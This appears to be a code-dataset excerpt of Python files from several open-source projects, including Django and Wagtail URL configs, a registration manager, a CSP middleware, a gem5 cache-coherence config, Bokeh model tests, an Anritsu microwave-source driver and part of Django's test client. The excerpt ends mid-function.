code
stringlengths 2
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 2
1.05M
|
|---|---|---|---|---|---|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.conf.urls import include, url
from django.views.i18n import javascript_catalog
from wagtail.wagtailadmin import urls as wagtailadmin_urls
from wagtail.wagtailcore import urls as wagtail_urls
from privagal.core import urls as privagalcore_urls
urlpatterns = [
url(r'^admin/', include(wagtailadmin_urls)),
url(r'^jsi18n/$', javascript_catalog, name='javascript-catalog'),
url(r'^gallery/', include('privagal.gallery.urls', namespace='galleries')),
url(r'^{}'.format(settings.MEDIA_URL[1:]), include(privagalcore_urls)),
url(r'', include(wagtail_urls)),
]
|
ychab/privagal
|
privagal/urls.py
|
Python
|
bsd-3-clause
| 689
|
import re
import random
import hashlib
from django.db import models
SHA1_RE = re.compile('^[a-f0-9]{40}$')
class RegistrationManager(models.Manager):
"""Custom manager for the ``RegistrationProfile`` model.
The methods defined here provide shortcuts for account creation
and activation (including generation and emailing of activation
keys), and for cleaning out expired inactive accounts.
"""
def activate_user(self, activation_key):
"""Validate an activation key and activate the corresponding
``User`` if valid.
If the key is valid and has not expired, return the ``User``
after activating.
If the key is not valid or has expired, return ``False``.
If the key is valid but the ``User`` is already active,
return ``False``.
"""
# Make sure the key we're trying conforms to the pattern of a
# SHA1 hash; if it doesn't, no point trying to look it up in
# the database.
if SHA1_RE.search(activation_key):
try:
profile = self.get(activation_key=activation_key)
except self.model.DoesNotExist:
return
return profile.activate()
def create_profile(self, user):
"""Create a ``RegistrationProfile`` for a given ``User``, and return
the ``RegistrationProfile``.
The activation key for the ``RegistrationProfile`` will be a SHA1 hash,
generated from a combination of the ``User``'s username and a random
salt.
"""
salt = hashlib.sha1(str(random.random())).hexdigest()[:5]
username = user.username
if isinstance(username, unicode):
username = username.encode('utf-8')
activation_key = hashlib.sha1(salt+username).hexdigest()
return self.create(user=user, activation_key=activation_key)
|
bruth/django-registration2
|
registration/managers.py
|
Python
|
bsd-3-clause
| 1,879
|
from django.conf import settings
from csp.utils import build_policy
class CSPMiddleware(object):
"""
Implements the X-Content-Security-Policy response header, which
conforming user-agents can use to restrict the permitted sources
of various content.
See https://wiki.mozilla.org/Security/CSP/Specification
"""
def process_response(self, request, response):
if getattr(response, '_csp_exempt', False):
return response
# Check for ignored path prefix.
for prefix in getattr(settings, 'CSP_EXCLUDE_URL_PREFIXES', []):
if request.path_info.startswith(prefix):
return response
header = 'X-Content-Security-Policy'
if getattr(settings, 'CSP_REPORT_ONLY', False):
header = 'X-Content-Security-Policy-Report-Only'
if header in response:
# Don't overwrite existing headers.
return response
if getattr(settings, 'CSP_POLICY_URI', False):
policy = 'policy-uri ' + settings.CSP_POLICY_URI
else:
policy = build_policy()
response[header] = policy
return response
|
jsocol/django-csp
|
csp/middleware.py
|
Python
|
bsd-3-clause
| 1,167
|
# Copyright (c) 2006-2007 The Regents of The University of Michigan
# Copyright (c) 2009 Advanced Micro Devices, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Brad Beckmann
import math
import m5
from m5.objects import *
from m5.defines import buildEnv
from Ruby import create_topology
from Ruby import send_evicts
#
# Declare caches used by the protocol
#
class L1Cache(RubyCache): pass
def define_options(parser):
return
def create_system(options, full_system, system, dma_ports, ruby_system):
if buildEnv['PROTOCOL'] != 'MI_example':
panic("This script requires the MI_example protocol to be built.")
cpu_sequencers = []
#
# The ruby network creation expects the list of nodes in the system to be
# consistent with the NetDest list. Therefore the l1 controller nodes must be
# listed before the directory nodes and directory nodes before dma nodes, etc.
#
l1_cntrl_nodes = []
dir_cntrl_nodes = []
dma_cntrl_nodes = []
#
# Must create the individual controllers before the network to ensure the
# controller constructors are called before the network constructor
#
block_size_bits = int(math.log(options.cacheline_size, 2))
for i in xrange(options.num_cpus):
#
# First create the Ruby objects associated with this cpu
# Only one cache exists for this protocol, so by default use the L1D
# config parameters.
#
cache = L1Cache(size = options.l1d_size,
assoc = options.l1d_assoc,
start_index_bit = block_size_bits)
#
# Only one unified L1 cache exists. Can cache instructions and data.
#
l1_cntrl = L1Cache_Controller(version = i,
cacheMemory = cache,
send_evictions = send_evicts(options),
transitions_per_cycle = options.ports,
clk_domain=system.cpu[i].clk_domain,
ruby_system = ruby_system)
cpu_seq = RubySequencer(version = i,
icache = cache,
dcache = cache,
clk_domain=system.cpu[i].clk_domain,
ruby_system = ruby_system)
l1_cntrl.sequencer = cpu_seq
exec("ruby_system.l1_cntrl%d = l1_cntrl" % i)
# Add controllers and sequencers to the appropriate lists
cpu_sequencers.append(cpu_seq)
l1_cntrl_nodes.append(l1_cntrl)
# Connect the L1 controllers and the network
l1_cntrl.mandatoryQueue = MessageBuffer()
l1_cntrl.requestFromCache = MessageBuffer(ordered = True)
l1_cntrl.requestFromCache.master = ruby_system.network.slave
l1_cntrl.responseFromCache = MessageBuffer(ordered = True)
l1_cntrl.responseFromCache.master = ruby_system.network.slave
l1_cntrl.forwardToCache = MessageBuffer(ordered = True)
l1_cntrl.forwardToCache.slave = ruby_system.network.master
l1_cntrl.responseToCache = MessageBuffer(ordered = True)
l1_cntrl.responseToCache.slave = ruby_system.network.master
phys_mem_size = sum(map(lambda r: r.size(), system.mem_ranges))
assert(phys_mem_size % options.num_dirs == 0)
mem_module_size = phys_mem_size / options.num_dirs
# Run each of the ruby memory controllers at a ratio of the frequency of
# the ruby system.
# clk_divider value is a fix to pass regression.
ruby_system.memctrl_clk_domain = DerivedClockDomain(
clk_domain=ruby_system.clk_domain,
clk_divider=3)
for i in xrange(options.num_dirs):
dir_size = MemorySize('0B')
dir_size.value = mem_module_size
dir_cntrl = Directory_Controller(version = i,
directory = RubyDirectoryMemory(
version = i, size = dir_size),
transitions_per_cycle = options.ports,
ruby_system = ruby_system)
exec("ruby_system.dir_cntrl%d = dir_cntrl" % i)
dir_cntrl_nodes.append(dir_cntrl)
# Connect the directory controllers and the network
dir_cntrl.requestToDir = MessageBuffer(ordered = True)
dir_cntrl.requestToDir.slave = ruby_system.network.master
dir_cntrl.dmaRequestToDir = MessageBuffer(ordered = True)
dir_cntrl.dmaRequestToDir.slave = ruby_system.network.master
dir_cntrl.responseFromDir = MessageBuffer()
dir_cntrl.responseFromDir.master = ruby_system.network.slave
dir_cntrl.dmaResponseFromDir = MessageBuffer(ordered = True)
dir_cntrl.dmaResponseFromDir.master = ruby_system.network.slave
dir_cntrl.forwardFromDir = MessageBuffer()
dir_cntrl.forwardFromDir.master = ruby_system.network.slave
dir_cntrl.responseFromMemory = MessageBuffer()
for i, dma_port in enumerate(dma_ports):
#
# Create the Ruby objects associated with the dma controller
#
dma_seq = DMASequencer(version = i,
ruby_system = ruby_system)
dma_cntrl = DMA_Controller(version = i,
dma_sequencer = dma_seq,
transitions_per_cycle = options.ports,
ruby_system = ruby_system)
exec("ruby_system.dma_cntrl%d = dma_cntrl" % i)
exec("ruby_system.dma_cntrl%d.dma_sequencer.slave = dma_port" % i)
dma_cntrl_nodes.append(dma_cntrl)
# Connect the directory controllers and the network
dma_cntrl.mandatoryQueue = MessageBuffer()
dma_cntrl.requestToDir = MessageBuffer()
dma_cntrl.requestToDir.master = ruby_system.network.slave
dma_cntrl.responseFromDir = MessageBuffer(ordered = True)
dma_cntrl.responseFromDir.slave = ruby_system.network.master
all_cntrls = l1_cntrl_nodes + dir_cntrl_nodes + dma_cntrl_nodes
# Create the io controller and the sequencer
if full_system:
io_seq = DMASequencer(version=len(dma_ports), ruby_system=ruby_system)
ruby_system._io_port = io_seq
io_controller = DMA_Controller(version = len(dma_ports),
dma_sequencer = io_seq,
ruby_system = ruby_system)
ruby_system.io_controller = io_controller
# Connect the dma controller to the network
io_controller.mandatoryQueue = MessageBuffer()
io_controller.requestToDir = MessageBuffer()
io_controller.requestToDir.master = ruby_system.network.slave
io_controller.responseFromDir = MessageBuffer(ordered = True)
io_controller.responseFromDir.slave = ruby_system.network.master
all_cntrls = all_cntrls + [io_controller]
topology = create_topology(all_cntrls, options)
return (cpu_sequencers, dir_cntrl_nodes, topology)
|
ayoubg/gem5-graphics
|
gem5/configs/ruby/MI_example.py
|
Python
|
bsd-3-clause
| 8,604
|
# proxy module
from traitsui.qt4.ui_live import *
|
enthought/etsproxy
|
enthought/traits/ui/qt4/ui_live.py
|
Python
|
bsd-3-clause
| 50
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2022, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import annotations # isort:skip
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Bokeh imports
from bokeh.core.properties import Int, List, String
from bokeh.models import * # NOQA
from bokeh.models import CustomJS
from bokeh.plotting import * # NOQA
from bokeh.document import document # isort:skip
# Module under test
from bokeh.model import Model # isort:skip
#-----------------------------------------------------------------------------
# Setup
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
class SomeModel(Model):
a = Int(12)
b = String("hello")
c = List(Int, [1, 2, 3])
class Test_js_on_change:
def test_exception_for_no_callbacks(self) -> None:
m = SomeModel()
with pytest.raises(ValueError):
m.js_on_change('foo')
def test_exception_for_bad_callbacks(self) -> None:
m = SomeModel()
for val in [10, "bar", None, [1], {}, 10.2]:
with pytest.raises(ValueError):
m.js_on_change('foo', val)
def test_with_propname(self) -> None:
cb = CustomJS(code="")
m0 = SomeModel()
for name in m0.properties():
m = SomeModel()
m.js_on_change(name, cb)
assert m.js_property_callbacks == {"change:%s" % name: [cb]}
def test_with_non_propname(self) -> None:
cb = CustomJS(code="")
m1 = SomeModel()
m1.js_on_change('foo', cb)
assert m1.js_property_callbacks == {"foo": [cb]}
m2 = SomeModel()
m2.js_on_change('change:b', cb)
assert m2.js_property_callbacks == {"change:b": [cb]}
def test_with_multple_callbacks(self) -> None:
cb1 = CustomJS(code="")
cb2 = CustomJS(code="")
m = SomeModel()
m.js_on_change('foo', cb1, cb2)
assert m.js_property_callbacks == {"foo": [cb1, cb2]}
def test_with_multple_callbacks_separately(self) -> None:
cb1 = CustomJS(code="")
cb2 = CustomJS(code="")
m = SomeModel()
m.js_on_change('foo', cb1)
assert m.js_property_callbacks == {"foo": [cb1]}
m.js_on_change('foo', cb2)
assert m.js_property_callbacks == {"foo": [cb1, cb2]}
def test_ignores_dupe_callbacks(self) -> None:
cb = CustomJS(code="")
m = SomeModel()
m.js_on_change('foo', cb, cb)
assert m.js_property_callbacks == {"foo": [cb]}
class Test_js_on_event:
def test_with_multple_callbacks(self) -> None:
cb1 = CustomJS(code="foo")
cb2 = CustomJS(code="bar")
m = SomeModel()
m.js_on_event("some", cb1, cb2)
assert m.js_event_callbacks == {"some": [cb1, cb2]}
def test_with_multple_callbacks_separately(self) -> None:
cb1 = CustomJS(code="foo")
cb2 = CustomJS(code="bar")
m = SomeModel()
m.js_on_event("some", cb1)
assert m.js_event_callbacks == {"some": [cb1]}
m.js_on_event("some", cb2)
assert m.js_event_callbacks == {"some": [cb1, cb2]}
def test_ignores_dupe_callbacks(self) -> None:
cb = CustomJS(code="foo")
m = SomeModel()
m.js_on_event("some", cb, cb)
assert m.js_event_callbacks == {"some": [cb]}
def test_ignores_dupe_callbacks_separately(self) -> None:
cb = CustomJS(code="foo")
m = SomeModel()
m.js_on_event("some", cb)
assert m.js_event_callbacks == {"some": [cb]}
m.js_on_event("some", cb)
assert m.js_event_callbacks == {"some": [cb]}
class Test_js_link:
def test_value_error_on_bad_attr(self) -> None:
m1 = SomeModel()
m2 = SomeModel()
with pytest.raises(ValueError) as e:
m1.js_link('junk', m2, 'b')
assert str(e.value).endswith("%r is not a property of self (%r)" % ("junk", m1))
def test_value_error_on_bad_other(self) -> None:
m1 = SomeModel()
with pytest.raises(ValueError) as e:
m1.js_link('a', 'junk', 'b')
assert str(e.value).endswith("'other' is not a Bokeh model: %r" % "junk")
def test_value_error_on_bad_other_attr(self) -> None:
m1 = SomeModel()
m2 = SomeModel()
with pytest.raises(ValueError) as e:
m1.js_link('a', m2, 'junk')
assert str(e.value).endswith("%r is not a property of other (%r)" % ("junk", m2))
def test_creates_customjs(self) -> None:
m1 = SomeModel()
m2 = SomeModel()
assert len(m1.js_property_callbacks) == 0
m1.js_link('a', m2, 'b')
assert len(m1.js_property_callbacks) == 1
assert "change:a" in m1.js_property_callbacks
cbs = m1.js_property_callbacks["change:a"]
assert len(cbs) == 1
cb = cbs[0]
assert isinstance(cb, CustomJS)
assert cb.args == dict(other=m2)
assert cb.code == "other.b = this.a"
def test_attr_selector_creates_customjs_int(self) -> None:
m1 = SomeModel()
m2 = SomeModel()
assert len(m1.js_property_callbacks) == 0
m1.js_link('a', m2, 'b', 1)
assert len(m1.js_property_callbacks) == 1
assert "change:a" in m1.js_property_callbacks
cbs = m1.js_property_callbacks["change:a"]
assert len(cbs) == 1
cb = cbs[0]
assert isinstance(cb, CustomJS)
assert cb.args == dict(other=m2)
assert cb.code == "other.b = this.a[1]"
def test_attr_selector_creates_customjs_with_zero(self) -> None:
m1 = SomeModel()
m2 = SomeModel()
assert len(m1.js_property_callbacks) == 0
m1.js_link('a', m2, 'b', 0)
assert len(m1.js_property_callbacks) == 1
assert "change:a" in m1.js_property_callbacks
cbs = m1.js_property_callbacks["change:a"]
assert len(cbs) == 1
cb = cbs[0]
assert isinstance(cb, CustomJS)
assert cb.args == dict(other=m2)
assert cb.code == "other.b = this.a[0]"
def test_attr_selector_creates_customjs_str(self) -> None:
m1 = SomeModel()
m2 = SomeModel()
assert len(m1.js_property_callbacks) == 0
m1.js_link('a', m2, 'b', "test")
assert len(m1.js_property_callbacks) == 1
assert "change:a" in m1.js_property_callbacks
cbs = m1.js_property_callbacks["change:a"]
assert len(cbs) == 1
cb = cbs[0]
assert isinstance(cb, CustomJS)
assert cb.args == dict(other=m2)
assert cb.code == "other.b = this.a['test']"
def test_all_builtin_models_default_constructible() -> None:
bad = []
for name, cls in Model.model_class_reverse_map.items():
try:
cls()
except Exception:
bad.append(name)
assert bad == []
def test_select() -> None:
# we aren't trying to replace test_query here, only test
# our wrappers around it, so no need to try every kind of
# query
d = document.Document()
root1 = SomeModel(a=42, name='a')
root2 = SomeModel(a=43, name='c')
root3 = SomeModel(a=44, name='d')
root4 = SomeModel(a=45, name='d')
d.add_root(root1)
d.add_root(root2)
d.add_root(root3)
d.add_root(root4)
# select()
assert {root1} == set(root1.select(dict(a=42)))
assert {root1} == set(root1.select(dict(name="a")))
assert {root2} == set(root2.select(dict(name="c")))
assert set() == set(root1.select(dict(name="nope")))
# select() on object
assert set() == set(root3.select(dict(name='a')))
assert {root3} == set(root3.select(dict(a=44)))
# select_one()
assert root3 == root3.select_one(dict(name='d'))
assert None == root1.select_one(dict(name='nope'))
with pytest.raises(ValueError) as e:
d.select_one(dict(name='d'))
assert 'Found more than one' in repr(e)
# select_one() on object
assert None == root3.select_one(dict(name='a'))
assert None == root3.select_one(dict(name='c'))
# set_select()
root1.set_select(dict(a=42), dict(name="c", a=44))
assert {root1} == set(root1.select(dict(name="c")))
assert {root1} == set(root1.select(dict(a=44)))
# set_select() on object
root3.set_select(dict(name='d'), dict(a=57))
assert {root3} == set(root3.select(dict(a=57)))
# set_select() on class
root2.set_select(SomeModel, dict(name='new_name'))
assert {root2} == set(root2.select(dict(name="new_name")))
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
|
bokeh/bokeh
|
tests/unit/bokeh/model/test_model.py
|
Python
|
bsd-3-clause
| 9,709
|
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright 2015-2018 by ExopyHqcLegacy Authors, see AUTHORS for more details.
#
# Distributed under the terms of the BSD license.
#
# The full license is in the file LICENCE, distributed with this software.
# -----------------------------------------------------------------------------
"""Drivers for Anritsu instrument using VISA library.
"""
import re
from textwrap import fill
from inspect import cleandoc
from visa import VisaTypeError
from ..driver_tools import (InstrIOError, secure_communication,
instrument_property)
from ..visa_tools import VisaInstrument
class AnritsuMG3694(VisaInstrument):
"""Driver for the Anritsu MG 3694 microwave source.
"""
def __init__(self, connection_info, caching_allowed=True,
caching_permissions={}, auto_open=True):
super(AnritsuMG3694, self).__init__(connection_info,
caching_allowed,
caching_permissions,
auto_open)
self.frequency_unit = 'GHz'
def open_connection(self, **para):
"""Open the connection to the instr using the `connection_str`.
"""
super(AnritsuMG3694, self).open_connection(**para)
self.write_termination = '\n'
self.read_termination = '\n'
self.write("DSPL 4")
self.write("EBW3") # if the external reference is very stable in phase
# the largest EBW must be chosen
self.write("LO0") # no offset on the power
self.write("LOG") # Selects logarithmic power level operation in dBm
self.write("TR1") # Sets 40 dB of attenuation when RF is switched off
self.write("PS1") # Turns on the Phase Offset
self.write("DS1") # Turns off the secure mode
self.write("AT1") # Selects ALC step attenuator decoupling
self.write("IL1") # Selects internal leveling of output power
@instrument_property
@secure_communication()
def frequency(self):
"""Frequency getter method
"""
freq = self.ask_for_values('FREQ?')[0]
if freq:
if self.frequency_unit == 'GHz':
return freq/1e9
elif self.frequency_unit == 'MHz':
return freq/1e6
elif self.frequency_unit == 'kHz':
return freq/1e3
else:
return freq
else:
raise InstrIOError(''' ''')
@frequency.setter
@secure_communication()
def frequency(self, value):
"""Frequency setter method
"""
unit = self.frequency_unit
self.write('FREQ {}{}'.format(value, unit))
result = self.ask_for_values('FREQ?')
if result:
if unit == 'GHz':
result[0] /= 1e9
elif unit == 'MHz':
result[0] /= 1e6
elif unit == 'kHz':
result[0] /= 1e3
if abs(result[0] - value) > 10**-12:
mes = 'Instrument did not set correctly the frequency'
raise InstrIOError(mes)
@instrument_property
@secure_communication()
def power(self):
"""Power getter method
"""
power = self.ask_for_values(':POW?')[0]
if power is not None:
return power
else:
raise InstrIOError
@power.setter
@secure_communication()
def power(self, value):
"""Power setter method
"""
self.write('POW {}'.format(value))
result = self.ask_for_values('POW?')[0]
if abs(result - value) > 10**-12:
raise InstrIOError('Instrument did not set correctly the power')
@instrument_property
@secure_communication()
def output(self):
"""Output getter method
"""
output = self.ask_for_values('OUTP?')[0]
if output == 1:
return 'ON'
elif output == 0:
return 'OFF'
else:
mes = 'Anritsu signal source did not return its output'
raise InstrIOError(mes)
@output.setter
@secure_communication()
def output(self, value):
"""Output setter method. 'ON', 'OFF'
"""
on = re.compile('on', re.IGNORECASE)
off = re.compile('off', re.IGNORECASE)
if on.match(value) or value == 1:
self.write('OUTP 1')
if self.ask_for_values('OUTP?')[0] != 1:
raise InstrIOError(cleandoc('''Instrument did not set correctly
the output'''))
elif off.match(value) or value == 0:
self.write('OUTP 0')
if self.ask_for_values('OUTP?')[0] != 0:
raise InstrIOError(cleandoc('''Instrument did not set correctly
the output'''))
else:
mess = fill(cleandoc('''The invalid value {} was sent to
switch_on_off method''').format(value), 80)
raise VisaTypeError(mess)
|
Ecpy/ecpy_hqc_legacy
|
exopy_hqc_legacy/instruments/drivers/visa/anritsu_signal_source.py
|
Python
|
bsd-3-clause
| 5,187
|
from __future__ import unicode_literals
import json
import mimetypes
import os
import re
import sys
from copy import copy
from importlib import import_module
from io import BytesIO
from django.conf import settings
from django.core.handlers.base import BaseHandler
from django.core.handlers.wsgi import ISO_8859_1, UTF_8, WSGIRequest
from django.core.signals import (
got_request_exception, request_finished, request_started,
)
from django.db import close_old_connections
from django.http import HttpRequest, QueryDict, SimpleCookie
from django.template import TemplateDoesNotExist
from django.test import signals
from django.test.utils import ContextList
from django.urls import resolve
from django.utils import six
from django.utils.encoding import force_bytes, force_str, uri_to_iri
from django.utils.functional import SimpleLazyObject, curry
from django.utils.http import urlencode
from django.utils.itercompat import is_iterable
from django.utils.six.moves.urllib.parse import urlparse, urlsplit
__all__ = ('Client', 'RedirectCycleError', 'RequestFactory', 'encode_file', 'encode_multipart')
BOUNDARY = 'BoUnDaRyStRiNg'
MULTIPART_CONTENT = 'multipart/form-data; boundary=%s' % BOUNDARY
CONTENT_TYPE_RE = re.compile('.*; charset=([\w\d-]+);?')
class RedirectCycleError(Exception):
"""
The test client has been asked to follow a redirect loop.
"""
def __init__(self, message, last_response):
super(RedirectCycleError, self).__init__(message)
self.last_response = last_response
self.redirect_chain = last_response.redirect_chain
class FakePayload(object):
"""
A wrapper around BytesIO that restricts what can be read since data from
the network can't be seeked and cannot be read outside of its content
length. This makes sure that views can't do anything under the test client
that wouldn't work in Real Life.
"""
def __init__(self, content=None):
self.__content = BytesIO()
self.__len = 0
self.read_started = False
if content is not None:
self.write(content)
def __len__(self):
return self.__len
def read(self, num_bytes=None):
if not self.read_started:
self.__content.seek(0)
self.read_started = True
if num_bytes is None:
num_bytes = self.__len or 0
assert self.__len >= num_bytes, "Cannot read more than the available bytes from the HTTP incoming data."
content = self.__content.read(num_bytes)
self.__len -= num_bytes
return content
def write(self, content):
if self.read_started:
raise ValueError("Unable to write a payload after he's been read")
content = force_bytes(content)
self.__content.write(content)
self.__len += len(content)
def closing_iterator_wrapper(iterable, close):
try:
for item in iterable:
yield item
finally:
request_finished.disconnect(close_old_connections)
close() # will fire request_finished
request_finished.connect(close_old_connections)
def conditional_content_removal(request, response):
"""
Simulate the behavior of most Web servers by removing the content of
responses for HEAD requests, 1xx, 204, and 304 responses. Ensures
compliance with RFC 2616, section 4.3.
"""
if 100 <= response.status_code < 200 or response.status_code in (204, 304):
if response.streaming:
response.streaming_content = []
else:
response.content = b''
response['Content-Length'] = '0'
if request.method == 'HEAD':
if response.streaming:
response.streaming_content = []
else:
response.content = b''
return response
class ClientHandler(BaseHandler):
"""
A HTTP Handler that can be used for testing purposes. Uses the WSGI
interface to compose requests, but returns the raw HttpResponse object with
the originating WSGIRequest attached to its ``wsgi_request`` attribute.
"""
def __init__(self, enforce_csrf_checks=True, *args, **kwargs):
self.enforce_csrf_checks = enforce_csrf_checks
super(ClientHandler, self).__init__(*args, **kwargs)
def __call__(self, environ):
# Set up middleware if needed. We couldn't do this earlier, because
# settings weren't available.
if self._request_middleware is None:
self.load_middleware()
request_started.disconnect(close_old_connections)
request_started.send(sender=self.__class__, environ=environ)
request_started.connect(close_old_connections)
request = WSGIRequest(environ)
# sneaky little hack so that we can easily get round
# CsrfViewMiddleware. This makes life easier, and is probably
# required for backwards compatibility with external tests against
# admin views.
request._dont_enforce_csrf_checks = not self.enforce_csrf_checks
# Request goes through middleware.
response = self.get_response(request)
# Simulate behaviors of most Web servers.
conditional_content_removal(request, response)
# Attach the originating request to the response so that it could be
# later retrieved.
response.wsgi_request = request
# We're emulating a WSGI server; we must call the close method
# on completion.
if response.streaming:
response.streaming_content = closing_iterator_wrapper(
response.streaming_content, response.close)
else:
request_finished.disconnect(close_old_connections)
response.close() # will fire request_finished
request_finished.connect(close_old_connections)
return response
def store_rendered_templates(store, signal, sender, template, context, **kwargs):
"""
Stores templates and contexts that are rendered.
The context is copied so that it is an accurate representation at the time
of rendering.
"""
store.setdefault('templates', []).append(template)
if 'context' not in store:
store['context'] = ContextList()
store['context'].append(copy(context))
def encode_multipart(boundary, data):
"""
Encodes multipart POST data from a dictionary of form values.
The key will be used as the form data name; the value will be transmitted
as content. If the value is a file, the contents of the file will be sent
as an application/octet-stream; otherwise, str(value) will be sent.
"""
lines = []
def to_bytes(s):
return force_bytes(s, settings.DEFAULT_CHARSET)
# Not by any means perfect, but good enough for our purposes.
def is_file(thing):
return hasattr(thing, "read") and callable(thing.read)
# Each bit of the multipart form data could be either a form value or a
# file, or a *list* of form values and/or files. Remember that HTTP field
# names can be duplicated!
for (key, value) in data.items():
if is_file(value):
lines.extend(encode_file(boundary, key, value))
elif not isinstance(value, six.string_types) and is_iterable(value):
for item in value:
if is_file(item):
lines.extend(encode_file(boundary, key, item))
else:
lines.extend(to_bytes(val) for val in [
'--%s' % boundary,
'Content-Disposition: form-data; name="%s"' % key,
'',
item
])
else:
lines.extend(to_bytes(val) for val in [
'--%s' % boundary,
'Content-Disposition: form-data; name="%s"' % key,
'',
value
])
lines.extend([
to_bytes('--%s--' % boundary),
b'',
])
return b'\r\n'.join(lines)
def encode_file(boundary, key, file):
def to_bytes(s):
return force_bytes(s, settings.DEFAULT_CHARSET)
filename = os.path.basename(file.name) if hasattr(file, 'name') else ''
if hasattr(file, 'content_type'):
content_type = file.content_type
elif filename:
content_type = mimetypes.guess_type(filename)[0]
else:
content_type = None
if content_type is None:
content_type = 'application/octet-stream'
if not filename:
filename = key
return [
to_bytes('--%s' % boundary),
to_bytes('Content-Disposition: form-data; name="%s"; filename="%s"'
% (key, filename)),
to_bytes('Content-Type: %s' % content_type),
b'',
to_bytes(file.read())
]
class RequestFactory(object):
"""
Class that lets you create mock Request objects for use in testing.
Usage:
rf = RequestFactory()
get_request = rf.get('/hello/')
post_request = rf.post('/submit/', {'foo': 'bar'})
Once you have a request object you can pass it to any view function,
just as if that view had been hooked up using a URLconf.
"""
def __init__(self, **defaults):
self.defaults = defaults
self.cookies = SimpleCookie()
self.errors = BytesIO()
def _base_environ(self, **request):
"""
The base environment for a request.
"""
# This is a minimal valid WSGI environ dictionary, plus:
# - HTTP_COOKIE: for cookie support,
# - REMOTE_ADDR: often useful, see #8551.
# See http://www.python.org/dev/peps/pep-3333/#environ-variables
environ = {
'HTTP_COOKIE': self.cookies.output(header='', sep='; '),
'PATH_INFO': str('/'),
'REMOTE_ADDR': str('127.0.0.1'),
'REQUEST_METHOD': str('GET'),
'SCRIPT_NAME': str(''),
'SERVER_NAME': str('testserver'),
'SERVER_PORT': str('80'),
'SERVER_PROTOCOL': str('HTTP/1.1'),
'wsgi.version': (1, 0),
'wsgi.url_scheme': str('http'),
'wsgi.input': FakePayload(b''),
'wsgi.errors': self.errors,
'wsgi.multiprocess': True,
'wsgi.multithread': False,
'wsgi.run_once': False,
}
environ.update(self.defaults)
environ.update(request)
return environ
def request(self, **request):
"Construct a generic request object."
return WSGIRequest(self._base_environ(**request))
def _encode_data(self, data, content_type):
if content_type is MULTIPART_CONTENT:
return encode_multipart(BOUNDARY, data)
else:
# Encode the content so that the byte representation is correct.
match = CONTENT_TYPE_RE.match(content_type)
if match:
charset = match.group(1)
else:
charset = settings.DEFAULT_CHARSET
return force_bytes(data, encoding=charset)
def _get_path(self, parsed):
path = force_str(parsed[2])
# If there are parameters, add them
if parsed[3]:
path += str(";") + force_str(parsed[3])
path = uri_to_iri(path).encode(UTF_8)
# Under Python 3, non-ASCII values in the WSGI environ are arbitrarily
# decoded with ISO-8859-1. We replicate this behavior here.
# Refs comment in `get_bytes_from_wsgi()`.
return path.decode(ISO_8859_1) if six.PY3 else path
def get(self, path, data=None, secure=False, **extra):
"Construct a GET request."
data = {} if data is None else data
r = {
'QUERY_STRING': urlencode(data, doseq=True),
}
r.update(extra)
return self.generic('GET', path, secure=secure, **r)
def post(self, path, data=None, content_type=MULTIPART_CONTENT,
secure=False, **extra):
"Construct a POST request."
data = {} if data is None else data
post_data = self._encode_data(data, content_type)
return self.generic('POST', path, post_data, content_type,
secure=secure, **extra)
def head(self, path, data=None, secure=False, **extra):
"Construct a HEAD request."
data = {} if data is None else data
r = {
'QUERY_STRING': urlencode(data, doseq=True),
}
r.update(extra)
return self.generic('HEAD', path, secure=secure, **r)
def trace(self, path, secure=False, **extra):
"Construct a TRACE request."
return self.generic('TRACE', path, secure=secure, **extra)
def options(self, path, data='', content_type='application/octet-stream',
secure=False, **extra):
"Construct an OPTIONS request."
return self.generic('OPTIONS', path, data, content_type,
secure=secure, **extra)
def put(self, path, data='', content_type='application/octet-stream',
secure=False, **extra):
"Construct a PUT request."
return self.generic('PUT', path, data, content_type,
secure=secure, **extra)
def patch(self, path, data='', content_type='application/octet-stream',
secure=False, **extra):
"Construct a PATCH request."
return self.generic('PATCH', path, data, content_type,
secure=secure, **extra)
def delete(self, path, data='', content_type='application/octet-stream',
secure=False, **extra):
"Construct a DELETE request."
return self.generic('DELETE', path, data, content_type,
secure=secure, **extra)
def generic(self, method, path, data='',
